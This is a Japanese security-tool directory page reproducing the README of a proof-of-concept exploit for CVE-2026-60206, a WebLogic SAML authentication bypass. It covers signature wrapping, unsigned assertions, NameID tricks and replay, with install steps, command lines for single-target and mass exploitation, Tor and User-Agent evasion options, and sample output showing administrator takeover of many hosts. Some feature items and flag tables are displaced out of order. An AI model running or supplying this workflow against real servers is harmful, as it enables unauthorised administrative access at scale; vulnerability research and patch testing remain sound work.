Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-60206 — 重大な Oracle WebLogic Server SAML 認証バイパス脆弱性である CVE-2026-60206 に関する技術的分析と Proof-of-Concept。 | Kitploit
ツール/GitHubGitHub/debajyoti0-0/cve-2026-60206
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証
GitHubdebajyoti0-0/cve-2026-60206

CVE-2026-60206

重大な Oracle WebLogic Server SAML 認証バイパス脆弱性である CVE-2026-60206 に関する技術的分析と Proof-of-Concept。

リポジトリを見る
26日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-60206 – Oracle WebLogic Server SAML 認証バイパス PoC

このリポジトリは、Oracle WebLogic Server の SAML 実装における重大な認証バイパス脆弱性である CVE‑2026‑60206 の概念実証エクスプロイトを提供します。この欠陥により、リモートの低権限攻撃者が SAML アサーションを偽造してサーバーを完全に侵害できます。

CVSS

⚠️ 免責事項: このツールは認可されたセキュリティ研究およびテストのみを目的としています。所有しているシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください。作者は誤用に対する一切の責任を負いません。

CVE-2026-60206 ロゴ

🔥 脆弱性の概要

CVE-2026-60206 は、Oracle WebLogic Server の Core コンポーネントに影響します。この脆弱性は、SAML プロトコル実装における不適切な認証処理に起因します。XML Signature Wrapping (XSW)、未署名アサーションの受理、NameID の操作、audience/conditions バイパスなどの複数の攻撃ベクトルにより、攻撃者は任意のユーザー(例: weblogic)を偽装し、管理アクセスを取得できます。

影響を受けるバージョン:

  • 12.2.1.4.0
  • 14.1.1.0.0
  • 14.1.2.0.0
  • 15.1.1.0.0

この PoC は以下の攻撃ベクトルを実装しています:

  • XML Signature Wrapping (XSW) – SAML プロセッサに未署名アサーションを受け入れさせる構造的操作。
  • Unsigned Assertion Injection – 完全に未署名の SAML レスポンスを作成(WantAssertionsSigned が強制されていない場合)。
  • NameID Manipulation – XML コメント、空白、またはフォーマットの混乱を利用して ID マッパーを混乱させる。
  • Audience Restriction Bypass – AudienceRestriction を削除または変更して適用範囲を広げる。
  • Conditions/Time Bypass – NotBefore/NotOnOrAfter を操作して有効性チェックをバイパスする。
  • Combined Attack – XSW + 未署名の内部アサーション + NameID 操作(最も成功する可能性が高い)。
  • Replay – 宛先/受信者を変更したキャプチャ済み SAML レスポンスを再生する。

✨ 機能

  • 複数の攻撃モード – all、unsigned、xsw、nameid、audience、conditions、combo、replay から選択。
  • 大量スキャン – 多数のターゲットに対する並行検出と任意のエクスプロイト(-l 経由)。
  • バージョン検出 – ヘッダー、エラーページ、WSDL を介して WebLogic のバージョンを正確に特定。
  • SAML エンドポイントのプロービング – SAML ACS、メタデータ、SP 開始エンドポイントを自動的に発見。
  • Tor サポート – 匿名性のため Tor (SOCKS5/HTTP/SOCKS4) 経由でトラフィックをルーティング。
  • 生の HTTP リクエスト再生 – ファイルから任意の生の HTTP リクエストを送信(-r)。
  • HTTP/2 サポート – インストールされていれば httpx を自動的に使用し、requests (HTTP/1.1) にフォールバック。
  • User-Agent ローテーション – ランダムまたはカスタムの User-Agent を使用。
  • – すべてのリクエストを HTTP/SOCKS プロキシ経由で送信。

📦 インストール

root@kitploit:~
git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

必須: requests、urllib3

任意(機能を向上):

  • httpx – HTTP/2 サポート用
  • lxml – SAML 解析の強化用
  • signxml、cryptography – 署名処理用(エクスプロイトには不要)

🚀 使い方

単一ターゲット – 検出のみ

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect

単一ターゲット – 全攻撃ベクトルを実行

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic

単一ターゲット – 特定の攻撃モード

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin

大量スキャン – ファイルからバージョンを検出

root@kitploit:~
python CVE-2026-60206.py -l targets.txt -o results.json

大量スキャン – 検出 + エクスプロイト

root@kitploit:~
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20

キャプチャした SAML レスポンスの再生

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml

Tor を使用して接続を確認

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor

ファイルから生の HTTP リクエストを送信

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST

クイック脆弱性チェック(非エクスプロイト)

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c

⚙️ フラグリファレンス

オプション:

ターゲット:

フラグ説明
-t, --target TARGET単一ターゲットの URL(例: https://host:7002)。
-l, --list LIST大量スキャン用のターゲットリストファイル、または単一 URL。
-f, --file FILE のエイリアス。

リクエストオプション:

攻撃設定:

大量スキャン(-l 使用時):

フラグ説明
--exploit未署名の SAML アサーションをテスト(デフォルト: 検出のみ)。
-T, --threads THREADS並行スレッド数(デフォルト: 10)。

出力:

フラグ説明
-v, --verbose詳細度を上げる(デバッグ出力)。
-q, --quiet重要でない出力を抑制。
--list-modes

🧪 モードの詳細

detect

バージョン検出と SAML エンドポイントのプロービングを実行します。攻撃は開始されません。

unsigned

完全に未署名の SAML アサーションを注入します。ターゲットが WantAssertionsSigned を強制していない場合、認証を完全にバイパスします。

バリアント: unsigned(デフォルト)、unsigned_stripped(すべての署名参照を削除)。

xsw (XML Signature Wrapping)

悪意のある未署名アサーションを、有効な署名付きアサーションの前(またはそれを包み込む形)に配置します。SAML プロセッサは最初のアサーションを採用する一方、署名検証器は署名付きアサーションを検証する可能性があります。

バリアント: xsw1(単純な前置)、xsw2(元と同じ ID)、xsw3(ネストされたラッパー)、xsw4(兄弟要素)。

nameid

NameID フィールドを操作して WebLogic の ID マッパーを混乱させ、別のユーザーへの偽装を可能にします。

バリアント: comment_injection、whitespace、format_confusion、xpath_injection。

audience

audience 要素を削除または変更して AudienceRestriction チェックをバイパスします。

バリアント: remove_audience、wildcard_audience、extra_audience。

conditions

時間ベースの制限(例: NotBefore、NotOnOrAfter)をバイパスします。

バリアント: future_timestamp、expired_timestamp、remove_conditions、infinite_validity。

combo

XSW、未署名アサーション、NameID 操作を 1 つのペイロードに組み合わせます – 完全な侵害に最もつながりやすいベクトルです。

バリアント: combo_full(コメント注入あり)、combo_stealth(改行あり)。

replay

以前にキャプチャした SAML レスポンスを再生し、必要に応じて宛先を変更したり audience 制限を削除したりします。

バリアント: replay_modified(Destination/Recipient を調整)、replay_cross_sp(audience 制限を削除)。

📝 ワークフロー例(単一ターゲットのエクスプロイト)

root@kitploit:~
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo

  ╔══════════════════════════════════════════════════════════════════════╗
  ║       CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC       ║
  ║         Oracle WebLogic Server Core | CVSS 9.9 | CWE-287             ║
  ╚══════════════════════════════════════════════════════════════════════╝

🔍 Detecting WebLogic version and SAML configuration...
  Detected WebLogic version: 12.2.1.4.0
  ⚠️  Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
  Found SAML metadata: /saml2/sp/metadata
  Found SAML ACS: /saml2/sp/acs (HTTP 200)

============================================================
🚀 Starting comprehensive SAML attack suite
   Target: https://192.168.1.100:7002
   Target User: weblogic
============================================================

── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================

 EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
   - [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
   - [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json

📝 ワークフロー例(大量スキャン)

root@kitploit:~
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10

============================================================
  CVE-2026-60206 Mass Scanner
  Targets: 50
  Threads: 10
  Mode:    Exploit
============================================================

  [10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s  
  [!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
  [!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
  ... (continues) ...

============================================================
  SCAN SUMMARY
============================================================
  Total targets:   50
  Reachable:       45
  WebLogic:        12
  Vuln version:    8
  Exploited:       3
  Duration:        42.5s
============================================================

  [!!] SUCCESSFULLY EXPLOITED:
    https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.15:7002 → weblogic via /saml2/sp/acs

  [!] VULNERABLE VERSIONS (not yet exploited):
    https://10.0.0.20:7002 (14.1.1.0.0)
    https://10.0.0.25:7002 (15.1.1.0.0)
    ... (truncated)

🛠️ 脆弱なテスト環境の構築

この PoC を安全にテストするには、SAML を有効にした影響を受けるバージョンのいずれかで WebLogic Server をセットアップしてください。たとえば、Docker を使用できます:

root@kitploit:~
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts

SAML 設定には、ACS エンドポイント(例: /saml2/sp/acs)を持つ SAML 2.0 Service Provider が少なくとも 1 つ含まれ、メタデータが公開されている必要があります。

🔗 参照

  • Oracle 2026年7月 Critical Patch Update アドバイザリ
  • CVE-2026-60206 詳細 – NIST NVD
  • CWE-287: 不適切な認証
  • SAML 2.0 セキュリティ分析 – XML Signature Wrapping

📜 ライセンス

このプロジェクトは GNU v3.0 License の下でライセンスされています。詳細は LICENSE ファイルを参照してください。

🤝 コントリビューション

Issue とプルリクエストを歓迎します。コントリビューションが同じ倫理的な使用ガイドラインに従うようにしてください。

注意: セキュリティツールをテストする前に、必ず適切な許可を取得してください。倫理的に行動しましょう!

ツールをダウンロード
プロキシサポート
  • リクエストのカスタマイズ – タイムアウト、リトライ、遅延の設定、リダイレクトの無効化、正規表現パターンでのリトライ。
  • ペイロードの保存 – 生成した SAML ペイロードをディスクに保存(--save-payloads)。
  • 脆弱性チェック (-c / --check) – ターゲットが脆弱かどうかを迅速に判定(非エクスプロイト)。
  • JSON/CSV レポート出力 – 大量スキャン用の構造化された結果。
  • 詳細ログ – カラーコンソールによる詳細なデバッグ出力。
  • フラグ説明
    -h, --helpヘルプメッセージを表示して終了。
    --proxy PROXYプロキシ URL(使用時は --tor によって上書き)。
    --no-verifySSL 証明書の検証を無効化。
    --cookie COOKIEセッション Cookie(例: name=value; name2=value2)。
    --auth AUTHベーシック認証の資格情報(USER:PASS)。
    --list
    フラグ説明
    -r, --requestfile REQUESTFILEファイルから生の HTTP リクエストを読み込み(SAML 攻撃を置き換え)。
    --method METHOD使用する HTTP メソッド(生リクエストまたは単一リクエスト用。デフォルト: GET)。
    --random-agent組み込みリストからランダムな User-Agent を使用。
    -A, --user-agent USER_AGENTカスタム User-Agent ヘッダー値。
    --torTor 匿名ネットワークを使用(デフォルトは SOCKS5)。
    --tor-port TOR_PORTTor プロキシポート(デフォルト: 9050)。
    --tor-type {HTTP,SOCKS4,SOCKS5}Tor プロキシタイプ(デフォルト: SOCKS5)。
    --check-torTor が正しく使用されているか確認(判定とともに終了)。
    --delay DELAY各リクエスト間の遅延(秒)。
    --timeout TIMEOUTタイムアウト(秒。デフォルト: 30)。
    --retries RETRIESタイムアウト/エラー時のリトライ回数(デフォルト: 3)。
    --retry-on RETRY_ONレスポンス内容が正規表現に一致する場合にリクエストをリトライ(例: 'captcha')。
    -dr, --disable-redirectsHTTP リダイレクトの追跡を無効化。
    フラグ説明
    -m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay}攻撃モード(デフォルト: all)。
    --detectWebLogic のバージョンと SAML 設定のみを検出(攻撃なし)。
    -c, --checkクイック脆弱性チェック(検出のみ、判定とともに終了)。
    -u, --user USER偽装する対象ユーザー(デフォルト: weblogic)。
    --groups GROUPSSAML アサーションに含めるグループ(デフォルト: Administrators,Monitors)。
    --issuer ISSUERSAML Issuer のエンティティ ID。
    --audience AUDIENCESAML Audience のエンティティ ID。
    --relay-state RELAY_STATESAML POST 用の RelayState パラメータ。
    --base64POST 内の SAML レスポンスを Base64 エンコード。
    --extra-attrs [NAME=VALUE ...]追加の SAML 属性(例: role=admin)。
    --replay-file REPLAY_FILE再生用にキャプチャした SAML レスポンスへのパス。
    --save-payloads生成した SAML ペイロードを ./payloads/ に保存。
    --continue-on-success攻撃が成功した後もテストを続行。
    全攻撃モードを説明付きで一覧表示して終了。
    -o, --output OUTPUTJSON または CSV レポートをファイルに書き込み。